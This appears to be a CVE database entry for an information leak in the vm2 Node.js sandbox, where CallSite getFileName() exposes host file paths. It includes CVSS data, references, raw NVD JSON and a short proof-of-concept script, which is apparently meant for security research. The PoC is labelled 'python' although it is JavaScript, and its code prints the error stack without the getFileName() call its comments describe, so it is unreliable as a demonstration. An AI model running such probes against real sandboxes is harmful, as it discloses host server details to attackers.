CVE-2026-44002

Description

vm2 is an open source vm/sandbox for Node.js. Prior to 3.11.0, vm2's CallSite wrapper class (intended as a safe wrapper for V8's native CallSite) blocks getThis() and getFunction() to prevent host object leakage, but allows getFileName() to return unsanitized host absolute paths. Any sandboxed code can extract the full directory structure, library paths, and framework versions of the host server. This vulnerability is fixed in 3.11.0.

CVSS Details

CVSS Score

5.8

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:vm2_project:vm2:*:*:*:*:*:node.js:*:* - VULNERABLE

vm2 < 3.11.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

const {VM} = require('vm2');
const vm = new VM();

// Malicious code intended to run inside the sandbox
const maliciousCode = `
  const err = new Error();
  // Access the stack trace which contains CallSite objects
  const stack = err.stack;
  
  // The vulnerable getFileName() method allows access to host absolute paths
  // This bypasses the sandbox restrictions designed to hide file structure
  console.log("[+] Leaking Host File Paths:");
  console.log(stack);
`;

vm.run(maliciousCode);

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-44002
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-44002
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-44002/
[4] VulDB https://vuldb.com/cve/CVE-2026-44002
[5] https://github.com/patriksimek/vm2/security/advisories/GHSA-v27g-jcqj-v8rw

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-44002", "sourceIdentifier": "[email protected]", "published": "2026-05-13T18:16:16.857", "lastModified": "2026-05-14T15:23:29.507", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "vm2 is an open source vm/sandbox for Node.js. Prior to 3.11.0, vm2's CallSite wrapper class (intended as a safe wrapper for V8's native CallSite) blocks getThis() and getFunction() to prevent host object leakage, but allows getFileName() to return unsanitized host absolute paths. Any sandboxed code can extract the full directory structure, library paths, and framework versions of the host server. This vulnerability is fixed in 3.11.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N", "baseScore": 5.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-209"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vm2_project:vm2:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "3.11.0", "matchCriteriaId": "6DD48308-6219-4C66-9BE7-246EE56FB834"}]}]}], "references": [{"url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-v27g-jcqj-v8rw", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}